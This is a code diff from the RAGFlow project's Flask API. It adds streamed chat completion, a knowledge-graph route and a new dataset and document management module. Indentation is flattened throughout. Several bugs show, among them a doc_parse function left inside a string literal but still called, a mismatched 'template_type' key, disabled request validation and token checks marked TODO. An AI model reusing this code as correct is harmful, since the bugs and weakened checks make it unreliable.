deleted_chunk_ids = req["chunk_ids"]
chunk_number = len(deleted_chunk_ids)
DocumentService.decrement_chunk_num(doc.id, doc.kb_id, 1, chunk_number, 0)
return get_json_result(data=True)
except Exception as e:
return server_error_response(e)
@ -222,13 +234,17 @@ def create():
if not tenant_id:
return get_data_error_result(retmsg="Tenant not found!")
embd_id = DocumentService.get_embd_id(req["doc_id"])
embd_mdl = TenantLLMService.model_instance(
tenant_id, LLMType.EMBEDDING.value)
tenant_id, LLMType.EMBEDDING.value, embd_id)
v, c = embd_mdl.encode([doc.name, req["content_with_weight"]])
DocumentService.increment_chunk_num(req["doc_id"], doc.kb_id, c, 1, 0)
v = 0.1 * v[0] + 0.9 * v[1]
d["q_%d_vec" % len(v)] = v.tolist()
ELASTICSEARCH.upsert([d], search.index_name(tenant_id))
DocumentService.increment_chunk_num(
doc.id, doc.kb_id, c, 1, 0)
return get_json_result(data={"chunk_id": chunck_id})
except Exception as e:
return server_error_response(e)
@ -254,8 +270,20 @@ def retrieval_test():
embd_mdl = TenantLLMService.model_instance(
kb.tenant_id, LLMType.EMBEDDING.value, llm_name=kb.embd_id)
ranks = retrievaler.retrieval(question, embd_mdl, kb.tenant_id, [kb_id], page, size, similarity_threshold,
vector_similarity_weight, top, doc_ids)
rerank_mdl = None
if req.get("rerank_id"):
rerank_mdl = TenantLLMService.model_instance(
kb.tenant_id, LLMType.RERANK.value, llm_name=req["rerank_id"])
if req.get("keyword", False):
chat_mdl = TenantLLMService.model_instance(kb.tenant_id, LLMType.CHAT)
question += keyword_extraction(chat_mdl, question)
retr = retrievaler if kb.parser_id != ParserType.KG else kg_retrievaler
ranks = retr.retrieval(question, embd_mdl, kb.tenant_id, [kb_id], page, size,
similarity_threshold, vector_similarity_weight, top,
doc_ids, rerank_mdl=rerank_mdl)
for c in ranks["chunks"]:
if "vector" in c:
del c["vector"]
@ -266,3 +294,25 @@ def retrieval_test():
return get_json_result(data=False, retmsg=f'No chunk found! Check the chunk status please!',
retcode=RetCode.DATA_ERROR)
return server_error_response(e)
@manager.route('/knowledge_graph', methods=['GET'])
@login_required
def knowledge_graph():
doc_id = request.args["doc_id"]
req = {
"doc_ids":[doc_id],
"knowledge_graph_kwd": ["graph", "mind_map"]
}
tenant_id = DocumentService.get_tenant_id(doc_id)
sres = retrievaler.search(req, search.index_name(tenant_id))
obj = {"graph": {}, "mind_map": {}}
for id in sres.ids[:2]:
ty = sres.field[id]["knowledge_graph_kwd"]
try:
obj[ty] = json.loads(sres.field[id]["content_with_weight"])
except Exception as e:
print(traceback.format_exc(), flush=True)
return get_json_result(data=obj)

View File

@ -13,12 +13,14 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
from flask import request
from copy import deepcopy
from flask import request, Response
from flask_login import login_required
from api.db.services.dialog_service import DialogService, ConversationService, chat
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
from api.utils import get_uuid
from api.utils.api_utils import get_json_result
import json
@manager.route('/set', methods=['POST'])
@ -103,9 +105,12 @@ def list_convsersation():
@manager.route('/completion', methods=['POST'])
@login_required
@validate_request("conversation_id", "messages")
#@validate_request("conversation_id", "messages")
def completion():
req = request.json
#req = {"conversation_id": "9aaaca4c11d311efa461fa163e197198", "messages": [
# {"role": "user", "content": "上海有吗?"}
#]}
msg = []
for m in req["messages"]:
if m["role"] == "system":
@ -117,19 +122,54 @@ def completion():
e, conv = ConversationService.get_by_id(req["conversation_id"])
if not e:
return get_data_error_result(retmsg="Conversation not found!")
conv.message.append(msg[-1])
conv.message.append(deepcopy(msg[-1]))
e, dia = DialogService.get_by_id(conv.dialog_id)
if not e:
return get_data_error_result(retmsg="Dialog not found!")
del req["conversation_id"]
del req["messages"]
ans = chat(dia, msg, **req)
if not conv.reference:
conv.reference = []
conv.reference.append(ans["reference"])
conv.message.append({"role": "assistant", "content": ans["answer"]})
ConversationService.update_by_id(conv.id, conv.to_dict())
return get_json_result(data=ans)
conv.message.append({"role": "assistant", "content": ""})
conv.reference.append({"chunks": [], "doc_aggs": []})
def fillin_conv(ans):
nonlocal conv
if not conv.reference:
conv.reference.append(ans["reference"])
else: conv.reference[-1] = ans["reference"]
conv.message[-1] = {"role": "assistant", "content": ans["answer"]}
def stream():
nonlocal dia, msg, req, conv
try:
for ans in chat(dia, msg, True, **req):
fillin_conv(ans)
yield "data:"+json.dumps({"retcode": 0, "retmsg": "", "data": ans}, ensure_ascii=False) + "\n\n"
ConversationService.update_by_id(conv.id, conv.to_dict())
except Exception as e:
yield "data:" + json.dumps({"retcode": 500, "retmsg": str(e),
"data": {"answer": "**ERROR**: "+str(e), "reference": []}},
ensure_ascii=False) + "\n\n"
yield "data:"+json.dumps({"retcode": 0, "retmsg": "", "data": True}, ensure_ascii=False) + "\n\n"
if req.get("stream", True):
resp = Response(stream(), mimetype="text/event-stream")
resp.headers.add_header("Cache-control", "no-cache")
resp.headers.add_header("Connection", "keep-alive")
resp.headers.add_header("X-Accel-Buffering", "no")
resp.headers.add_header("Content-Type", "text/event-stream; charset=utf-8")
return resp
else:
answer = None
for ans in chat(dia, msg, **req):
answer = ans
fillin_conv(ans)
ConversationService.update_by_id(conv.id, conv.to_dict())
break
return get_json_result(data=answer)
except Exception as e:
return server_error_response(e)

876
api/apps/dataset_api.py Normal file
View File

@ -0,0 +1,876 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pathlib
import re
import warnings
from functools import partial
from io import BytesIO
from elasticsearch_dsl import Q
from flask import request, send_file
from flask_login import login_required, current_user
from httpx import HTTPError
from api.contants import NAME_LENGTH_LIMIT
from api.db import FileType, ParserType, FileSource, TaskStatus
from api.db import StatusEnum
from api.db.db_models import File
from api.db.services import duplicate_name
from api.db.services.document_service import DocumentService
from api.db.services.file2document_service import File2DocumentService
from api.db.services.file_service import FileService
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.user_service import TenantService
from api.settings import RetCode
from api.utils import get_uuid
from api.utils.api_utils import construct_json_result, construct_error_response
from api.utils.api_utils import construct_result, validate_request
from api.utils.file_utils import filename_type, thumbnail
from rag.app import book, laws, manual, naive, one, paper, presentation, qa, resume, table, picture, audio
from rag.nlp import search
from rag.utils.es_conn import ELASTICSEARCH
from rag.utils.minio_conn import MINIO
MAXIMUM_OF_UPLOADING_FILES = 256
# ------------------------------ create a dataset ---------------------------------------
@manager.route("/", methods=["POST"])
@login_required # use login
@validate_request("name") # check name key
def create_dataset():
# Check if Authorization header is present
authorization_token = request.headers.get("Authorization")
if not authorization_token:
return construct_json_result(code=RetCode.AUTHENTICATION_ERROR, message="Authorization header is missing.")
# TODO: Login or API key
# objs = APIToken.query(token=authorization_token)
#
# # Authorization error
# if not objs:
# return construct_json_result(code=RetCode.AUTHENTICATION_ERROR, message="Token is invalid.")
#
# tenant_id = objs[0].tenant_id
tenant_id = current_user.id
request_body = request.json
# In case that there's no name
if "name" not in request_body:
return construct_json_result(code=RetCode.DATA_ERROR, message="Expected 'name' field in request body")
dataset_name = request_body["name"]
# empty dataset_name
if not dataset_name:
return construct_json_result(code=RetCode.DATA_ERROR, message="Empty dataset name")
# In case that there's space in the head or the tail
dataset_name = dataset_name.strip()
# In case that the length of the name exceeds the limit
dataset_name_length = len(dataset_name)
if dataset_name_length > NAME_LENGTH_LIMIT:
return construct_json_result(
code=RetCode.DATA_ERROR,
message=f"Dataset name: {dataset_name} with length {dataset_name_length} exceeds {NAME_LENGTH_LIMIT}!")
# In case that there are other fields in the data-binary
if len(request_body.keys()) > 1:
name_list = []
for key_name in request_body.keys():
if key_name != "name":
name_list.append(key_name)
return construct_json_result(code=RetCode.DATA_ERROR,
message=f"fields: {name_list}, are not allowed in request body.")
# If there is a duplicate name, it will modify it to make it unique
request_body["name"] = duplicate_name(
KnowledgebaseService.query,
name=dataset_name,
tenant_id=tenant_id,
status=StatusEnum.VALID.value)
try:
request_body["id"] = get_uuid()
request_body["tenant_id"] = tenant_id
request_body["created_by"] = tenant_id
exist, t = TenantService.get_by_id(tenant_id)
if not exist:
return construct_result(code=RetCode.AUTHENTICATION_ERROR, message="Tenant not found.")
request_body["embd_id"] = t.embd_id
if not KnowledgebaseService.save(**request_body):
# failed to create new dataset
return construct_result()
return construct_json_result(code=RetCode.SUCCESS,
data={"dataset_name": request_body["name"], "dataset_id": request_body["id"]})
except Exception as e:
return construct_error_response(e)
# -----------------------------list datasets-------------------------------------------------------
@manager.route("/", methods=["GET"])
@login_required
def list_datasets():
offset = request.args.get("offset", 0)
count = request.args.get("count", -1)
orderby = request.args.get("orderby", "create_time")
desc = request.args.get("desc", True)
try:
tenants = TenantService.get_joined_tenants_by_user_id(current_user.id)
datasets = KnowledgebaseService.get_by_tenant_ids_by_offset(
[m["tenant_id"] for m in tenants], current_user.id, int(offset), int(count), orderby, desc)
return construct_json_result(data=datasets, code=RetCode.SUCCESS, message=f"List datasets successfully!")
except Exception as e:
return construct_error_response(e)
except HTTPError as http_err:
return construct_json_result(http_err)
# ---------------------------------delete a dataset ----------------------------
@manager.route("/<dataset_id>", methods=["DELETE"])
@login_required
def remove_dataset(dataset_id):
try:
datasets = KnowledgebaseService.query(created_by=current_user.id, id=dataset_id)
# according to the id, searching for the dataset
if not datasets:
return construct_json_result(message=f"The dataset cannot be found for your current account.",
code=RetCode.OPERATING_ERROR)
# Iterating the documents inside the dataset
for doc in DocumentService.query(kb_id=dataset_id):
if not DocumentService.remove_document(doc, datasets[0].tenant_id):
# the process of deleting failed
return construct_json_result(code=RetCode.DATA_ERROR,
message="There was an error during the document removal process. "
"Please check the status of the RAGFlow server and try the removal again.")
# delete the other files
f2d = File2DocumentService.get_by_document_id(doc.id)
FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == f2d[0].file_id])
File2DocumentService.delete_by_document_id(doc.id)
# delete the dataset
if not KnowledgebaseService.delete_by_id(dataset_id):
return construct_json_result(code=RetCode.DATA_ERROR,
message="There was an error during the dataset removal process. "
"Please check the status of the RAGFlow server and try the removal again.")
# success
return construct_json_result(code=RetCode.SUCCESS, message=f"Remove dataset: {dataset_id} successfully")
except Exception as e:
return construct_error_response(e)
# ------------------------------ get details of a dataset ----------------------------------------
@manager.route("/<dataset_id>", methods=["GET"])
@login_required
def get_dataset(dataset_id):
try:
dataset = KnowledgebaseService.get_detail(dataset_id)
if not dataset:
return construct_json_result(code=RetCode.DATA_ERROR, message="Can't find this dataset!")
return construct_json_result(data=dataset, code=RetCode.SUCCESS)
except Exception as e:
return construct_json_result(e)
# ------------------------------ update a dataset --------------------------------------------
@manager.route("/<dataset_id>", methods=["PUT"])
@login_required
def update_dataset(dataset_id):
req = request.json
try:
# the request cannot be empty
if not req:
return construct_json_result(code=RetCode.DATA_ERROR, message="Please input at least one parameter that "
"you want to update!")
# check whether the dataset can be found
if not KnowledgebaseService.query(created_by=current_user.id, id=dataset_id):
return construct_json_result(message=f"Only the owner of knowledgebase is authorized for this operation!",
code=RetCode.OPERATING_ERROR)
exist, dataset = KnowledgebaseService.get_by_id(dataset_id)
# check whether there is this dataset
if not exist:
return construct_json_result(code=RetCode.DATA_ERROR, message="This dataset cannot be found!")
if "name" in req:
name = req["name"].strip()
# check whether there is duplicate name
if name.lower() != dataset.name.lower() \
and len(KnowledgebaseService.query(name=name, tenant_id=current_user.id,
status=StatusEnum.VALID.value)) > 1:
return construct_json_result(code=RetCode.DATA_ERROR,
message=f"The name: {name.lower()} is already used by other "
f"datasets. Please choose a different name.")
dataset_updating_data = {}
chunk_num = req.get("chunk_num")
# modify the value of 11 parameters
# 2 parameters: embedding id and chunk method
# only if chunk_num is 0, the user can update the embedding id
if req.get("embedding_model_id"):
if chunk_num == 0:
dataset_updating_data["embd_id"] = req["embedding_model_id"]
else:
return construct_json_result(code=RetCode.DATA_ERROR,
message="You have already parsed the document in this "
"dataset, so you cannot change the embedding "
"model.")
# only if chunk_num is 0, the user can update the chunk_method
if "chunk_method" in req:
type_value = req["chunk_method"]
if is_illegal_value_for_enum(type_value, ParserType):
return construct_json_result(message=f"Illegal value {type_value} for 'chunk_method' field.",
code=RetCode.DATA_ERROR)
if chunk_num != 0:
construct_json_result(code=RetCode.DATA_ERROR, message="You have already parsed the document "
"in this dataset, so you cannot "
"change the chunk method.")
dataset_updating_data["parser_id"] = req["template_type"]
# convert the photo parameter to avatar
if req.get("photo"):
dataset_updating_data["avatar"] = req["photo"]
# layout_recognize
if "layout_recognize" in req:
if "parser_config" not in dataset_updating_data:
dataset_updating_data['parser_config'] = {}
dataset_updating_data['parser_config']['layout_recognize'] = req['layout_recognize']
# TODO: updating use_raptor needs to construct a class
# 6 parameters
for key in ["name", "language", "description", "permission", "id", "token_num"]:
if key in req:
dataset_updating_data[key] = req.get(key)
# update
if not KnowledgebaseService.update_by_id(dataset.id, dataset_updating_data):
return construct_json_result(code=RetCode.OPERATING_ERROR, message="Failed to update! "
"Please check the status of RAGFlow "
"server and try again!")
exist, dataset = KnowledgebaseService.get_by_id(dataset.id)
if not exist:
return construct_json_result(code=RetCode.DATA_ERROR, message="Failed to get the dataset "
"using the dataset ID.")
return construct_json_result(data=dataset.to_json(), code=RetCode.SUCCESS)
except Exception as e:
return construct_error_response(e)
# --------------------------------content management ----------------------------------------------
# ----------------------------upload files-----------------------------------------------------
@manager.route("/<dataset_id>/documents/", methods=["POST"])
@login_required
def upload_documents(dataset_id):
# no files
if not request.files:
return construct_json_result(
message="There is no file!", code=RetCode.ARGUMENT_ERROR)
# the number of uploading files exceeds the limit
file_objs = request.files.getlist("file")
num_file_objs = len(file_objs)
if num_file_objs > MAXIMUM_OF_UPLOADING_FILES:
return construct_json_result(code=RetCode.DATA_ERROR, message=f"You try to upload {num_file_objs} files, "
f"which exceeds the maximum number of uploading files: {MAXIMUM_OF_UPLOADING_FILES}")
# no dataset
exist, dataset = KnowledgebaseService.get_by_id(dataset_id)
if not exist:
return construct_json_result(message="Can't find this dataset", code=RetCode.DATA_ERROR)
for file_obj in file_objs:
file_name = file_obj.filename
# no name
if not file_name:
return construct_json_result(
message="There is a file without name!", code=RetCode.ARGUMENT_ERROR)
# TODO: support the remote files
if 'http' in file_name:
return construct_json_result(code=RetCode.ARGUMENT_ERROR, message="Remote files have not unsupported.")
# get the root_folder
root_folder = FileService.get_root_folder(current_user.id)
# get the id of the root_folder
parent_file_id = root_folder["id"] # document id
# this is for the new user, create '.knowledgebase' file
FileService.init_knowledgebase_docs(parent_file_id, current_user.id)
# go inside this folder, get the kb_root_folder
kb_root_folder = FileService.get_kb_folder(current_user.id)
# link the file management to the kb_folder
kb_folder = FileService.new_a_file_from_kb(dataset.tenant_id, dataset.name, kb_root_folder["id"])
# grab all the errs
err = []
MAX_FILE_NUM_PER_USER = int(os.environ.get("MAX_FILE_NUM_PER_USER", 0))
uploaded_docs_json = []
for file in file_objs:
try:
# TODO: get this value from the database as some tenants have this limit while others don't
if MAX_FILE_NUM_PER_USER > 0 and DocumentService.get_doc_count(dataset.tenant_id) >= MAX_FILE_NUM_PER_USER:
return construct_json_result(code=RetCode.DATA_ERROR,
message="Exceed the maximum file number of a free user!")
# deal with the duplicate name
filename = duplicate_name(
DocumentService.query,
name=file.filename,
kb_id=dataset.id)
# deal with the unsupported type
filetype = filename_type(filename)
if filetype == FileType.OTHER.value:
return construct_json_result(code=RetCode.DATA_ERROR,
message="This type of file has not been supported yet!")
# upload to the minio
location = filename
while MINIO.obj_exist(dataset_id, location):
location += "_"
blob = file.read()
# the content is empty, raising a warning
if blob == b'':
warnings.warn(f"[WARNING]: The content of the file {filename} is empty.")
MINIO.put(dataset_id, location, blob)
doc = {
"id": get_uuid(),
"kb_id": dataset.id,
"parser_id": dataset.parser_id,
"parser_config": dataset.parser_config,
"created_by": current_user.id,
"type": filetype,
"name": filename,
"location": location,
"size": len(blob),
"thumbnail": thumbnail(filename, blob)
}
if doc["type"] == FileType.VISUAL:
doc["parser_id"] = ParserType.PICTURE.value
if doc["type"] == FileType.AURAL:
doc["parser_id"] = ParserType.AUDIO.value
if re.search(r"\.(ppt|pptx|pages)$", filename):
doc["parser_id"] = ParserType.PRESENTATION.value
DocumentService.insert(doc)
FileService.add_file_from_kb(doc, kb_folder["id"], dataset.tenant_id)
uploaded_docs_json.append(doc)
except Exception as e:
err.append(file.filename + ": " + str(e))
if err:
# return all the errors
return construct_json_result(message="\n".join(err), code=RetCode.SERVER_ERROR)
# success
return construct_json_result(data=uploaded_docs_json, code=RetCode.SUCCESS)
# ----------------------------delete a file-----------------------------------------------------
@manager.route("/<dataset_id>/documents/<document_id>", methods=["DELETE"])
@login_required
def delete_document(document_id, dataset_id): # string
# get the root folder
root_folder = FileService.get_root_folder(current_user.id)
# parent file's id
parent_file_id = root_folder["id"]
# consider the new user
FileService.init_knowledgebase_docs(parent_file_id, current_user.id)
# store all the errors that may have
errors = ""
try:
# whether there is this document
exist, doc = DocumentService.get_by_id(document_id)
if not exist:
return construct_json_result(message=f"Document {document_id} not found!", code=RetCode.DATA_ERROR)
# whether this doc is authorized by this tenant
tenant_id = DocumentService.get_tenant_id(document_id)
if not tenant_id:
return construct_json_result(
message=f"You cannot delete this document {document_id} due to the authorization"
f" reason!", code=RetCode.AUTHENTICATION_ERROR)
# get the doc's id and location
real_dataset_id, location = File2DocumentService.get_minio_address(doc_id=document_id)
if real_dataset_id != dataset_id:
return construct_json_result(message=f"The document {document_id} is not in the dataset: {dataset_id}, "
f"but in the dataset: {real_dataset_id}.", code=RetCode.ARGUMENT_ERROR)
# there is an issue when removing
if not DocumentService.remove_document(doc, tenant_id):
return construct_json_result(
message="There was an error during the document removal process. Please check the status of the "
"RAGFlow server and try the removal again.", code=RetCode.OPERATING_ERROR)
# fetch the File2Document record associated with the provided document ID.
file_to_doc = File2DocumentService.get_by_document_id(document_id)
# delete the associated File record.
FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == file_to_doc[0].file_id])
# delete the File2Document record itself using the document ID. This removes the
# association between the document and the file after the File record has been deleted.
File2DocumentService.delete_by_document_id(document_id)
# delete it from minio
MINIO.rm(dataset_id, location)
except Exception as e:
errors += str(e)
if errors:
return construct_json_result(data=False, message=errors, code=RetCode.SERVER_ERROR)
return construct_json_result(data=True, code=RetCode.SUCCESS)
# ----------------------------list files-----------------------------------------------------
@manager.route('/<dataset_id>/documents/', methods=['GET'])
@login_required
def list_documents(dataset_id):
if not dataset_id:
return construct_json_result(
data=False, message="Lack of 'dataset_id'", code=RetCode.ARGUMENT_ERROR)
# searching keywords
keywords = request.args.get("keywords", "")
offset = request.args.get("offset", 0)
count = request.args.get("count", -1)
order_by = request.args.get("order_by", "create_time")
descend = request.args.get("descend", True)
try:
docs, total = DocumentService.list_documents_in_dataset(dataset_id, int(offset), int(count), order_by,
descend, keywords)
return construct_json_result(data={"total": total, "docs": docs}, message=RetCode.SUCCESS)
except Exception as e:
return construct_error_response(e)
# ----------------------------update: enable rename-----------------------------------------------------
@manager.route("/<dataset_id>/documents/<document_id>", methods=["PUT"])
@login_required
def update_document(dataset_id, document_id):
req = request.json
try:
legal_parameters = set()
legal_parameters.add("name")
legal_parameters.add("enable")
legal_parameters.add("template_type")
for key in req.keys():
if key not in legal_parameters:
return construct_json_result(code=RetCode.ARGUMENT_ERROR, message=f"{key} is an illegal parameter.")
# The request body cannot be empty
if not req:
return construct_json_result(
code=RetCode.DATA_ERROR,
message="Please input at least one parameter that you want to update!")
# Check whether there is this dataset
exist, dataset = KnowledgebaseService.get_by_id(dataset_id)
if not exist:
return construct_json_result(code=RetCode.DATA_ERROR, message=f"This dataset {dataset_id} cannot be found!")
# The document does not exist
exist, document = DocumentService.get_by_id(document_id)
if not exist:
return construct_json_result(message=f"This document {document_id} cannot be found!",
code=RetCode.ARGUMENT_ERROR)
# Deal with the different keys
updating_data = {}
if "name" in req:
new_name = req["name"]
updating_data["name"] = new_name
# Check whether the new_name is suitable
# 1. no name value
if not new_name:
return construct_json_result(code=RetCode.DATA_ERROR, message="There is no new name.")
# 2. In case that there's space in the head or the tail
new_name = new_name.strip()
# 3. Check whether the new_name has the same extension of file as before
if pathlib.Path(new_name.lower()).suffix != pathlib.Path(
document.name.lower()).suffix:
return construct_json_result(
data=False,
message="The extension of file cannot be changed",
code=RetCode.ARGUMENT_ERROR)
# 4. Check whether the new name has already been occupied by other file
for d in DocumentService.query(name=new_name, kb_id=document.kb_id):
if d.name == new_name:
return construct_json_result(
message="Duplicated document name in the same dataset.",
code=RetCode.ARGUMENT_ERROR)
if "enable" in req:
enable_value = req["enable"]
if is_illegal_value_for_enum(enable_value, StatusEnum):
return construct_json_result(message=f"Illegal value {enable_value} for 'enable' field.",
code=RetCode.DATA_ERROR)
updating_data["status"] = enable_value
# TODO: Chunk-method - update parameters inside the json object parser_config
if "template_type" in req:
type_value = req["template_type"]
if is_illegal_value_for_enum(type_value, ParserType):
return construct_json_result(message=f"Illegal value {type_value} for 'template_type' field.",
code=RetCode.DATA_ERROR)
updating_data["parser_id"] = req["template_type"]
# The process of updating
if not DocumentService.update_by_id(document_id, updating_data):
return construct_json_result(
code=RetCode.OPERATING_ERROR,
message="Failed to update document in the database! "
"Please check the status of RAGFlow server and try again!")
# name part: file service
if "name" in req:
# Get file by document id
file_information = File2DocumentService.get_by_document_id(document_id)
if file_information:
exist, file = FileService.get_by_id(file_information[0].file_id)
FileService.update_by_id(file.id, {"name": req["name"]})
exist, document = DocumentService.get_by_id(document_id)
# Success
return construct_json_result(data=document.to_json(), message="Success", code=RetCode.SUCCESS)
except Exception as e:
return construct_error_response(e)
# Helper method to judge whether it's an illegal value
def is_illegal_value_for_enum(value, enum_class):
return value not in enum_class.__members__.values()
# ----------------------------download a file-----------------------------------------------------
@manager.route("/<dataset_id>/documents/<document_id>", methods=["GET"])
@login_required
def download_document(dataset_id, document_id):
try:
# Check whether there is this dataset
exist, _ = KnowledgebaseService.get_by_id(dataset_id)
if not exist:
return construct_json_result(code=RetCode.DATA_ERROR,
message=f"This dataset '{dataset_id}' cannot be found!")
# Check whether there is this document
exist, document = DocumentService.get_by_id(document_id)
if not exist:
return construct_json_result(message=f"This document '{document_id}' cannot be found!",
code=RetCode.ARGUMENT_ERROR)
# The process of downloading
doc_id, doc_location = File2DocumentService.get_minio_address(doc_id=document_id) # minio address
file_stream = MINIO.get(doc_id, doc_location)
if not file_stream:
return construct_json_result(message="This file is empty.", code=RetCode.DATA_ERROR)
file = BytesIO(file_stream)
# Use send_file with a proper filename and MIME type
return send_file(
file,
as_attachment=True,
download_name=document.name,
mimetype='application/octet-stream' # Set a default MIME type
)
# Error
except Exception as e:
return construct_error_response(e)
# ----------------------------start parsing a document-----------------------------------------------------
# helper method for parsing
# callback method
def doc_parse_callback(doc_id, prog=None, msg=""):
cancel = DocumentService.do_cancel(doc_id)
if cancel:
raise Exception("The parsing process has been cancelled!")
"""
def doc_parse(binary, doc_name, parser_name, tenant_id, doc_id):
match parser_name:
case "book":
book.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
case "laws":
laws.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
case "manual":
manual.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
case "naive":
# It's the mode by default, which is general in the front-end
naive.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
case "one":
one.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
case "paper":
paper.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
case "picture":
picture.chunk(doc_name, binary=binary, tenant_id=tenant_id, lang="Chinese",
callback=partial(doc_parse_callback, doc_id))
case "presentation":
presentation.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
case "qa":
qa.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
case "resume":
resume.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
case "table":
table.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
case "audio":
audio.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
case _:
return False
return True
"""
@manager.route("/<dataset_id>/documents/<document_id>/status", methods=["POST"])
@login_required
def parse_document(dataset_id, document_id):
try:
# valid dataset
exist, _ = KnowledgebaseService.get_by_id(dataset_id)
if not exist:
return construct_json_result(code=RetCode.DATA_ERROR,
message=f"This dataset '{dataset_id}' cannot be found!")
return parsing_document_internal(document_id)
except Exception as e:
return construct_error_response(e)
# ----------------------------start parsing documents-----------------------------------------------------
@manager.route("/<dataset_id>/documents/status", methods=["POST"])
@login_required
def parse_documents(dataset_id):
doc_ids = request.json["doc_ids"]
try:
exist, _ = KnowledgebaseService.get_by_id(dataset_id)
if not exist:
return construct_json_result(code=RetCode.DATA_ERROR,
message=f"This dataset '{dataset_id}' cannot be found!")
# two conditions
if not doc_ids:
# documents inside the dataset
docs, total = DocumentService.list_documents_in_dataset(dataset_id, 0, -1, "create_time",
True, "")
doc_ids = [doc["id"] for doc in docs]
message = ""
# for loop
for id in doc_ids:
res = parsing_document_internal(id)
res_body = res.json
if res_body["code"] == RetCode.SUCCESS:
message += res_body["message"]
else:
return res
return construct_json_result(data=True, code=RetCode.SUCCESS, message=message)
except Exception as e:
return construct_error_response(e)
# helper method for parsing the document
def parsing_document_internal(id):
message = ""
try:
# Check whether there is this document
exist, document = DocumentService.get_by_id(id)
if not exist:
return construct_json_result(message=f"This document '{id}' cannot be found!",
code=RetCode.ARGUMENT_ERROR)
tenant_id = DocumentService.get_tenant_id(id)
if not tenant_id:
return construct_json_result(message="Tenant not found!", code=RetCode.AUTHENTICATION_ERROR)
info = {"run": "1", "progress": 0}
info["progress_msg"] = ""
info["chunk_num"] = 0
info["token_num"] = 0
DocumentService.update_by_id(id, info)
ELASTICSEARCH.deleteByQuery(Q("match", doc_id=id), idxnm=search.index_name(tenant_id))
_, doc_attributes = DocumentService.get_by_id(id)
doc_attributes = doc_attributes.to_dict()
doc_id = doc_attributes["id"]
bucket, doc_name = File2DocumentService.get_minio_address(doc_id=doc_id)
binary = MINIO.get(bucket, doc_name)
parser_name = doc_attributes["parser_id"]
if binary:
res = doc_parse(binary, doc_name, parser_name, tenant_id, doc_id)
if res is False:
message += f"The parser id: {parser_name} of the document {doc_id} is not supported; "
else:
message += f"Empty data in the document: {doc_name}; "
# failed in parsing
if doc_attributes["status"] == TaskStatus.FAIL.value:
message += f"Failed in parsing the document: {doc_id}; "
return construct_json_result(code=RetCode.SUCCESS, message=message)
except Exception as e:
return construct_error_response(e)
# ----------------------------stop parsing a doc-----------------------------------------------------
@manager.route("<dataset_id>/documents/<document_id>/status", methods=["DELETE"])
@login_required
def stop_parsing_document(dataset_id, document_id):
try:
# valid dataset
exist, _ = KnowledgebaseService.get_by_id(dataset_id)
if not exist:
return construct_json_result(code=RetCode.DATA_ERROR,
message=f"This dataset '{dataset_id}' cannot be found!")
return stop_parsing_document_internal(document_id)
except Exception as e:
return construct_error_response(e)
# ----------------------------stop parsing docs-----------------------------------------------------
@manager.route("<dataset_id>/documents/status", methods=["DELETE"])
@login_required
def stop_parsing_documents(dataset_id):
doc_ids = request.json["doc_ids"]
try:
# valid dataset?
exist, _ = KnowledgebaseService.get_by_id(dataset_id)
if not exist:
return construct_json_result(code=RetCode.DATA_ERROR,
message=f"This dataset '{dataset_id}' cannot be found!")
if not doc_ids:
# documents inside the dataset
docs, total = DocumentService.list_documents_in_dataset(dataset_id, 0, -1, "create_time",
True, "")
doc_ids = [doc["id"] for doc in docs]
message = ""
# for loop
for id in doc_ids:
res = stop_parsing_document_internal(id)
res_body = res.json
if res_body["code"] == RetCode.SUCCESS:
message += res_body["message"]
else:
return res
return construct_json_result(data=True, code=RetCode.SUCCESS, message=message)
except Exception as e:
return construct_error_response(e)
# Helper method
def stop_parsing_document_internal(document_id):
try:
# valid doc?
exist, doc = DocumentService.get_by_id(document_id)
if not exist:
return construct_json_result(message=f"This document '{document_id}' cannot be found!",
code=RetCode.ARGUMENT_ERROR)
doc_attributes = doc.to_dict()
# only when the status is parsing, we need to stop it
if doc_attributes["status"] == TaskStatus.RUNNING.value:
tenant_id = DocumentService.get_tenant_id(document_id)
if not tenant_id:
return construct_json_result(message="Tenant not found!", code=RetCode.AUTHENTICATION_ERROR)
# update successfully?
if not DocumentService.update_by_id(document_id, {"status": "2"}): # cancel
return construct_json_result(
code=RetCode.OPERATING_ERROR,
message="There was an error during the stopping parsing the document process. "
"Please check the status of the RAGFlow server and try the update again."
)
_, doc_attributes = DocumentService.get_by_id(document_id)
doc_attributes = doc_attributes.to_dict()
# failed in stop parsing
if doc_attributes["status"] == TaskStatus.RUNNING.value:
return construct_json_result(message=f"Failed in parsing the document: {document_id}; ", code=RetCode.SUCCESS)
return construct_json_result(code=RetCode.SUCCESS, message="")
except Exception as e:
return construct_error_response(e)
# ----------------------------show the status of the file-----------------------------------------------------
@manager.route("/<dataset_id>/documents/<document_id>/status", methods=["GET"])
@login_required
def show_parsing_status(dataset_id, document_id):
try:
# valid dataset
exist, _ = KnowledgebaseService.get_by_id(dataset_id)
if not exist:
return construct_json_result(code=RetCode.DATA_ERROR,
message=f"This dataset: '{dataset_id}' cannot be found!")
# valid document
exist, _ = DocumentService.get_by_id(document_id)
if not exist:
return construct_json_result(code=RetCode.DATA_ERROR,
